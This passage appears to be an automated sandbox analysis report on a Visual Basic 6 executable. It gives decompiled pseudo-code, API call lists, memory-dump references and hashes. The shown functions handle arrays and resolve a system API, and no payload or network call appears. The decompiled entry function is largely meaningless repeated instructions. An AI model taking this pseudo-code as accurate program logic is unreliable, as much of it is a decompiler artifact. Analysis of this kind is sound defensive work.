					__imp____vbaFreeVarList(4,  &_v44,  &_v60,  &_v76,  &_v92);
				}
				RtlFillMemory(_t73, 0x16, 0);
				_t70 = __imp__#644;
				_t42 =  *_t70(_a8);
				_t31 = _t73 + 8; // 0x8
				_v160 = _t42;
				E004253CD(_t42, _t31);
				_t44 =  *_t70(_a4);
				_t34 = _t73 + 4; // 0x4
				_v160 = _t44;
				E004253CD(_t44, _t34);
				_v160 = 0x42495f;
				E004253CD( *_t70( &_v160), _t73);
				_t48 = E00424CD9();
				_push(E00428F4E);
				return _t48;
			}

0x00428de3
0x00428de6
0x00428df1
0x00428df2
0x00428dff
0x00428e00
0x00428e01
0x00428e02
0x00428e05
0x00428e15
0x00428e18
0x00428e1b
0x00428e1e
0x00428e21
0x00428e24
0x00428e2e
0x00428e33
0x00428e37
0x00428e3a
0x00428e40
0x00428e4b
0x00428e51
0x00428e5d
0x00428e60
0x00428e63
0x00428e66
0x00428e69
0x00428e6c
0x00428e6f
0x00428e72
0x00428e8a
0x00428e8f
0x00428e91
0x00428e9c
0x00428e9c
0x00428ea5
0x00428ebd
0x00428ec3
0x00428eca
0x00428ed3
0x00428eda
0x00428edc
0x00428edf
0x00428ee7
0x00428ef0
0x00428ef2
0x00428ef5
0x00428efd
0x00428f08
0x00428f17
0x00428f1c
0x00428f21
0x00000000

APIs

Part of subcall function 00428F70: __vbaRedim.MSVBVM60(00000080,00000001,00441258,00000011,00000001,00004000,00000000,66106AEE,660DDE99,00000000), ref: 00428FBD
Part of subcall function 00428F70: __vbaAryLock.MSVBVM60(00000000,00000000,66106AEE,660DDE99,00000000), ref: 00428FD2
Part of subcall function 00428F70: #644.MSVBVM60(00000000), ref: 00428FEF
Part of subcall function 00428F70: __vbaAryUnlock.MSVBVM60(00000000), ref: 00428FFB

#685.MSVBVM60(?,66106AEE,660DDE99,660DC30A), ref: 00428E40
__vbaObjSet.MSVBVM60(?,00000000), ref: 00428E4B
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403088,00000044), ref: 00428E9C
__vbaFreeObj.MSVBVM60 ref: 00428EA5
__vbaFreeVarList.MSVBVM60(00000004,?,?,?,?), ref: 00428EBD
RtlFillMemory.KERNEL32(00000000,00000016,00000000), ref: 00428ECA
#644.MSVBVM60(00401006), ref: 00428EDA
#644.MSVBVM60(?,00000000,00000008), ref: 00428EF0
#644.MSVBVM60(00000016,00000000,00000004), ref: 00428F13

Strings

_IB, xrefs: 00428F02, 00428F12

Memory Dump Source

Source File: 00000012.00000002.782181214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.782162276.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782388581.0000000000440000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782411560.0000000000441000.00000004.00020000.sdmp Download File
Associated: 00000012.00000002.782434479.0000000000443000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$#644$Free$#685CheckFillHresultListLockMemoryRedimUnlock
String ID: _IB
API String ID: 1484531433-566781039
Opcode ID: 404ce250f540260efce9313b1b315116154fc4503c670bc4fe2f0ec43521d06a
Instruction ID: 5b08ff808bf3f3b14dbfb30bdd4b20c13048f8bab26c75cf304eb3e81de64eb6
Opcode Fuzzy Hash: 404ce250f540260efce9313b1b315116154fc4503c670bc4fe2f0ec43521d06a
Instruction Fuzzy Hash: 0E4126B4D00219EFDB10EFA5DC85EEEBBB8EF48704F50452EF609A2241E77459458B64

Uniqueness

Uniqueness Score: -1.00%

Function 00428F70, Relevance: 6.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

__vbaRedim.MSVBVM60(00000080,00000001,00441258,00000011,00000001,00004000,00000000,66106AEE,660DDE99,00000000), ref: 00428FBD
__vbaAryLock.MSVBVM60(00000000,00000000,66106AEE,660DDE99,00000000), ref: 00428FD2
#644.MSVBVM60(00000000), ref: 00428FEF
__vbaAryUnlock.MSVBVM60(00000000), ref: 00428FFB

Memory Dump Source

Source File: 00000012.00000002.782181214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.782162276.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782388581.0000000000440000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782411560.0000000000441000.00000004.00020000.sdmp Download File
Associated: 00000012.00000002.782434479.0000000000443000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$#644LockRedimUnlock
String ID:
API String ID: 3120749027-0
Opcode ID: 98c1c33e3b286230cab91b822e8052a3dc155f47098fbe05f8a3925a0a497166
Instruction ID: 59034deb7ef29a92a43b171159d234d98ea9408361dae5a8e2bed9d0baccf448
Opcode Fuzzy Hash: 98c1c33e3b286230cab91b822e8052a3dc155f47098fbe05f8a3925a0a497166
Instruction Fuzzy Hash: 45118278A40308EFD714DF54DD85F6A7BB5FB05710F148258FA05AB3A0C7B4A880CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0042504B, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 69
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E0042504B(void* __ecx, intOrPtr* _a4) {
				char _v524;
				void* _t16;
				struct HINSTANCE__* _t21;
				_Unknown_base(*)()* _t24;
				struct HINSTANCE__* _t26;
				void* _t33;
				char* _t38;
				char* _t41;

				_t38 = 0x424a5a;
				_t33 = 0x441024;
				while( *_t38 != 0xe7) {
					E0042500D(_t16, _t38);
					E0042533D( &_v524, "SysAllocStringByteLen", 0xffffffff);
					_t21 = E004251CF( &_v524); // executed
					if(_t21 != 0) {
						_t26 = _t21;
						_t16 = 0xe7;
						asm("repne scasw");
						_t41 = _t38;
						while( *_t41 != 0xe7) {
							E0042502F(_t16, _t41);
							_t24 = GetProcAddress(_t26, "SysAllocStringByteLen");
							if(_t24 != 0) {
								asm("stosd");
								_t16 = 0xe7;
								asm("repne scasb");
								continue;
							}
							return _t24;
						}
						_t38 = _t41 + 1;
						continue;
					}
					return _t21;
				}
				 *0x44100c = 1;
				 *0x0044100E = 1;
				 *0x00441010 = 4;
				 *0x00441014 = 0;
				 *0x00441018 = _t33 - 0x80;
				 *0x0044101C = 0x20;
				 *0x00441020 = 0;
				 *_a4 = 0x44100c;
				return  !0x00000000;
			}

0x00425057
0x0042505c
0x00425061
0x00425069
0x0042507c
0x00425088
0x00425090
0x00425094
0x0042509b
0x004250a1
0x004250a4
0x004250a6
0x004250ac
0x004250b9
0x004250c2
0x004250c6
0x004250ce
0x004250d0
0x00000000
0x004250d2
0x00000000
0x004250c2
0x004250d6
0x00000000
0x004250d6
0x00000000
0x00425090
0x004250e6
0x004250eb
0x004250f1
0x004250f8
0x004250fb
0x004250fe
0x00425105
0x0042510b
0x00000000

APIs

GetProcAddress.KERNEL32(00000000,SysAllocStringByteLen), ref: 004250B9

Strings

SysAllocStringByteLen, xrefs: 00425070, 004250B1, 004250B7

Memory Dump Source

Source File: 00000012.00000002.782181214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.782162276.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782388581.0000000000440000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782411560.0000000000441000.00000004.00020000.sdmp Download File
Associated: 00000012.00000002.782434479.0000000000443000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AddressProc
String ID: SysAllocStringByteLen
API String ID: 190572456-3231582829
Opcode ID: d397069b8be84d0a12b67b19dfe109b3ac5e7810a93cca978c821ef9f1ef1029
Instruction ID: a6a5919c05af50f6c5137a6b16499f8fe98e0fa3029fda4f8b272497c6fb6cf2
Opcode Fuzzy Hash: d397069b8be84d0a12b67b19dfe109b3ac5e7810a93cca978c821ef9f1ef1029
Instruction Fuzzy Hash: 1D113A36A00B309AD3209F64EC04F5BB7F4EB84314F50CA2BD06687691EBBC55C587D9

Uniqueness

Uniqueness Score: -1.00%

Function 0040121C, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 87%

			_entry_(signed int __eax, void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __fp0, char _a1, char _a121) {
				void* _v36;
				void* _v42;
				void* _v54;
				void* _v56;
				void* _v58;
				void* _v60;
				void* _v74;
				void* _v82;
				intOrPtr _v97;
				void* _v102;
				void* _v106;
				intOrPtr* _t156;
				void* _t157;
				signed char _t159;
				intOrPtr* _t161;
				intOrPtr* _t162;
				signed int _t167;
				intOrPtr* _t168;
				intOrPtr* _t170;
				intOrPtr* _t171;
				void* _t172;
				signed int _t174;
				signed char _t175;
				signed char _t180;
				signed char _t181;
				signed char _t183;
				intOrPtr* _t249;
				signed int _t251;
				signed int _t253;
				signed int _t254;
				intOrPtr* _t256;
				void* _t258;
				intOrPtr* _t260;
				char* _t261;
				intOrPtr* _t266;
				intOrPtr* _t271;
				intOrPtr* _t274;
				signed int _t278;
				signed int _t280;
				void* _t286;
				char* _t287;
				signed int _t289;
				signed int _t290;
				void* _t294;
				void* _t299;
				intOrPtr _t310;
				void* _t333;

				_t333 = __fp0;
				_t274 = __edi;
				_push("VB5!6&VB6DE.DLL"); // executed
				L00401216(); // executed
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax ^ __eax;
				 *__eax =  *__eax + __eax;
				_t156 = __eax - 1;
				 *_t156 =  *_t156 + _t156;
				 *_t156 =  *_t156 + _t156;
				 *_t156 =  *_t156 + _t156;
				 *__edi =  *__edi + __ecx;
				_t290 = _t289 &  *(__edi + 0x38);
				asm("fisttp word [eax+0x45]");
				 *(__edi + 2) =  *(__edi + 2) ^ 0x00000024;
				_t266 = _t156;
				 *_t156 =  *_t156 + _t156;
				 *_t156 =  *_t156 + _t156;
				 *_t156 =  *_t156 + _t156;
				 *_t156 =  *_t156 + _t156;
				 *_t156 =  *_t156 + _t156;
				 *_t156 =  *_t156 + _t156;
				 *_t156 =  *_t156 + _t156;
				 *_t156 =  *_t156 + _t156;
				_t258 = __ebx + 1;
				asm("popad");
				asm("o16 jae 0x6b");
				asm("o16 jae 0x6a");
				asm("insd");
				_t278 =  *(_t258 + 0x65) * 0x66;
				 *_t156 =  *_t156 + _t156;
				 *_t156 =  *_t156 + _t156;
				 *_t156 =  *_t156 + _t156;
				 *_t156 =  *_t156 + _t156;
				 *_t156 =  *_t156 + _t156;
				 *_t278 =  *_t278 + _t156;
				 *_t156 =  *_t156 + _t156;
				0xb[_t278] =  &(0xb[0xb[_t278]]);
				_t157 = _t156 + 1;
				 *_t266 =  *_t266 + _t157;
				 *0xb =  *0xb + _t157;
				_t159 = _t157 + 0x0000000b &  *(_t157 + 0xb);
				 *_t159 =  *_t159 + _t159;
				 *_t159 =  *_t159 + _t159;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *_t159 =  *_t159 + _t159;
				 *_t159 =  *_t159 + _t159;
				_t161 = _t159 + 1 + _t258;
				asm("adc [eax+eax], eax");
				 *_t161 =  *_t161 + _t161;
				_t162 = _t161 + 0xb;
				asm("insb");
				 *_t162 =  *_t162 + _t162;
				 *_t162 =  *_t162 + _t162;
				 *_t162 =  *_t162 + _t162;
				 *_t162 =  *_t162 + _t162;
				 *_t266 =  *_t266 + 0x13;
				 *0x00000026 =  *((intOrPtr*)(0x26)) + 0x13;
				 *0xb =  *0xb << 1;
				 *0x00000014 =  *((intOrPtr*)(0x14)) + 0x14;
				 *((intOrPtr*)(0x14)) =  *((intOrPtr*)(0x14)) + 0x14;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *((intOrPtr*)(0x14)) =  *((intOrPtr*)(0x14)) + 1;
				 *((intOrPtr*)(0x14)) =  *((intOrPtr*)(0x14)) + 0x14;
				_t167 = 0x28 &  *0x00000028;
				asm("cld");
				asm("adc [eax+eax], eax");
				 *_t167 =  *_t167 + _t167;
				 *_t167 =  *_t167 + _t167;
				asm("out dx, eax");
				asm("insb");
				_push(es);
				 *_t167 =  *_t167 + _t167;
				 *_t167 =  *_t167 + _t167;
				 *_t167 =  *_t167 + _t167;
				 *_t167 =  *_t167 + _t167;
				 *_t167 =  *_t167 + _t167;
				 *_t167 =  *_t167 + _t167;
				asm("in al, dx");
				asm("adc al, [eax]");
				 *_t167 =  *_t167 + _t167;
				 *_t167 =  *_t167 + _t167;
				 *0xb =  *0xb << 1;
				_t168 = _t167 + 1;
				 *_t168 =  *_t168 + _t168;
				 *_t168 =  *_t168 + _t168;
				_t260 = _t258 + _t258 + _t258 + _t258;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *_t168 =  *_t168 + 1;
				 *_t168 =  *_t168 + _t168;
				 *_t260 =  *_t260 + 0x12;
				_t170 = _t168 + 1 + _t266;
				asm("adc [eax+eax], eax");
				 *_t170 =  *_t170 + _t170;
				_t171 = _t170 + _t170;
				 *(_t171 + 6) =  *(_t171 + 6) ^ 0x00000000;
				 *_t171 =  *_t171 + _t171;
				 *_t171 =  *_t171 + _t171;
				 *_t171 =  *_t171 + _t171;
				 *_t171 =  *_t171 + _t171;
				 *_t171 =  *_t171 + _t171;
				 *((intOrPtr*)(_t260 + 0xb)) =  *((intOrPtr*)(_t260 + 0xb)) + _t171;
				_t172 = _t171 + 1;
				 *_t266 =  *_t266 + _t172;
				 *_t266 =  *_t266 + _t172;
				_t174 = _t172 + 0x0000000b &  *(_t172 + 0xb);
				 *_t174 =  *_t174 + _t174;
				 *_t174 =  *_t174 + _t174;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *_t174 =  *_t174 + _t174;
				 *_t174 =  *_t174 + _t174;
				_push(_t290);
				_t175 = _t174 &  *_t174;
				asm("in al, dx");
				asm("adc [eax+eax], eax");
				 *_t175 =  *_t175 + _t175;
				_t17 = _t175 - 0x5d;
				 *_t17 =  *((intOrPtr*)(_t175 - 0x5d)) + 0xb;
				if( *_t17 != 0) {
					 *_t175 =  *_t175 + _t175;
					 *_t175 =  *_t175 & _t175;
					 *_t175 =  *_t175 + _t175;
				}
				 *_t175 =  *_t175 + _t175;
				if( *_t175 == 0) {
					 *0x2b =  *0x2b + 0x2b;
					 *0x2b =  *0x2b + 0x2b;
					 *0x2b =  *0x2b + 0x2b;
					 *0x2b =  *0x2b + 0x2b;
					 *0x2b =  *0x2b + 0x2b;
					 *0x2b =  *0x2b + 0x2b;
					 *_t260 =  *_t260 + 0x2b;
					 *0x2b =  *0x2b + 0x2b;
					 *0x2b =  *0x2b + 0x2b;
					 *0x0000002B =  *((intOrPtr*)(0x2b)) + 0x2b;
					 *((intOrPtr*)(0x2b)) =  *((intOrPtr*)(0x2b)) + 0x2b;
					 *((intOrPtr*)(0x2b)) =  *((intOrPtr*)(0x2b)) + 0x2b;
					 *((intOrPtr*)(0x2b)) =  *((intOrPtr*)(0x2b)) + 0x2b;
					 *((intOrPtr*)(0x2b)) =  *((intOrPtr*)(0x2b)) + 0x2b;
					 *((intOrPtr*)(0x2b)) =  *((intOrPtr*)(0x2b)) + 0x2b;
					 *((intOrPtr*)(0x2b)) =  *((intOrPtr*)(0x2b)) + 0x2b;
					 *((intOrPtr*)(0x2b)) =  *((intOrPtr*)(0x2b)) + 0x2b;
					 *((intOrPtr*)(0x2b)) =  *((intOrPtr*)(0x2b)) + 0x2b;
					 *((intOrPtr*)(0x2b)) =  *((intOrPtr*)(0x2b)) + 0x2b;
					 *0x4C004073 =  *((intOrPtr*)(0x4c004073)) + 0xb;
					 *((intOrPtr*)(0x2b)) =  *((intOrPtr*)(0x2b)) + 0x2b;
					 *((intOrPtr*)(0x2b)) =  *((intOrPtr*)(0x2b)) + 0xb;
					 *((intOrPtr*)(0x2b)) =  *((intOrPtr*)(0x2b)) + 0x2b;
					_t178 = 0x5d2cee9d;
					_push(_t260);
					if( *((intOrPtr*)(0x2b)) == 0) {
						_v97 = _v97 - 0xf4f41550;
						_t251 = _t290;
						_t290 = 0x5d2cee9d;
						 *_t251 =  *_t251 + _t251;
						 *_t251 =  *_t251 + _t251;
						 *_t251 =  *_t251 + _t251;
						 *_t251 =  *_t251 + _t251;
						 *_t251 =  *_t251 + _t251;
						 *_t251 =  *_t251 + _t251;
						 *_t251 =  *_t251 + _t251;
						 *_t251 =  *_t251 + _t251;
						_t253 = _t251 + 0x80000000 +  *((intOrPtr*)(_t251 + 0x80000000));
						 *_t253 =  *_t253 + _t253;
						 *_t253 =  *_t253 + _t253;
						 *_t253 =  *_t253 + _t253;
						 *_t253 =  *_t253 + _t253;
						 *_t253 =  *_t253 + _t253;
						 *_t253 =  *_t253 + _t253;
						 *_t253 =  *_t253 + _t253;
						 *_t253 =  *_t253 + _t253;
						 *_t253 =  *_t253 + _t253;
						 *_t253 =  *_t253 + _t253;
						 *((intOrPtr*)(_t266 + 4)) =  *((intOrPtr*)(_t266 + 4)) + _t266;
						 *_t253 =  *_t253 + _t253;
						 *((intOrPtr*)(0x5d2cee9d + _t253 * 2)) =  *((intOrPtr*)(0x5d2cee9d + _t253 * 2)) + _t253;
						_t254 = _t253 + 1;
						 *((intOrPtr*)(_t254 + _t254 + 0x42560000)) =  *((intOrPtr*)(_t254 + _t254 + 0x42560000)) + _t260;
						_t178 = _t254 ^ 0x56263621;
					}
					_t287 =  &_a1;
					_t294 = _t290 + 2;
					 *_t178 =  *_t178 + _t178;
					 *_t178 =  *_t178 + _t178;
					 *0x0000000C =  *((intOrPtr*)(0xc)) + _t266;
					 *_t178 =  *_t178 + _t178;
					 *_t178 =  *_t178 + _t178;
					 *_t178 =  *_t178 + _t178;
					 *_t178 =  *_t178 + _t178;
					 *_t178 =  *_t178 + _t178;
					 *_t178 =  *_t178 + _t178;
					 *((intOrPtr*)(0xc)) =  *((intOrPtr*)(0xc)) + _t266;
					 *_t274 =  *_t274 + _t178;
					 *_t266 =  *_t266 + _t266;
					_t180 = _t178;
					 *_t180 =  *_t180 + 0xc;
					_t280 = 0x1fc;
					_t271 = 0xd;
					 *((intOrPtr*)(_t294 + 0xfffffffff033004d)) =  *((intOrPtr*)(_t294 + 0xfffffffff033004d)) + 0xd;
					 *_t180 =  *_t180 ^ _t180;
					_t261 = _t260 + _t260;
					asm("invalid");
					 *_t180 =  *_t180 | _t180;
					 *_t180 =  *_t180 + _t180;
					 *_t180 =  *_t180 + _t180;
					 *_t180 =  *_t180 + _t180;
					_t181 = _t180 +  *_t180;
					 *_t181 =  *_t181 | _t181;
					goto 0x6040144d;
					asm("adc eax, [eax]");
					asm("insb");
					 *((intOrPtr*)(0xd)) =  *((intOrPtr*)(0xd)) - 0xd;
					_t183 = (_t181 ^  *_t181) + 1;
					 *_t183 =  *_t183 + _t261;
					 *_t183 =  *_t183 + _t183;
					 *_t183 =  *_t183 + _t183;
					asm("lahf");
					 *_t183 =  *_t183 + _t183;
					 *_t183 =  *_t183 + _t183;
					 *_t183 =  *_t183 + _t183;
					 *_t183 =  *_t183 + _t183;
					 *_t183 =  *_t183 + _t183;
					 *_t183 =  *_t183 + _t183;
					 *_t183 =  *_t183 + _t183;
					 *_t183 =  *_t183 + _t183;
					 *_t183 =  *_t183 + _t183;
					_t39 =  &_a121;
					 *_t39 = _a121 + _t266;
					_t310 =  *_t39;
					if(_t310 < 0) {
						L21:
						 *_t183 =  *_t183 + _t183;
						goto L22;
					} else {
						asm("outsb");
						if(_t310 >= 0) {
							L17:
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							L18:
							 *_t183 =  *_t183 + _t183;
							L19:
							 *_t183 =  *_t183 + _t183;
							L20:
							 *_t183 =  *_t183 + _t183;
							goto L21;
						}
						if(_t310 >= 0) {
							goto L18;
						}
						if(_t310 >= 0) {
							goto L20;
						}
						if(_t310 >= 0) {
							goto L19;
						}
						if(_t310 >= 0) {
							L22:
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
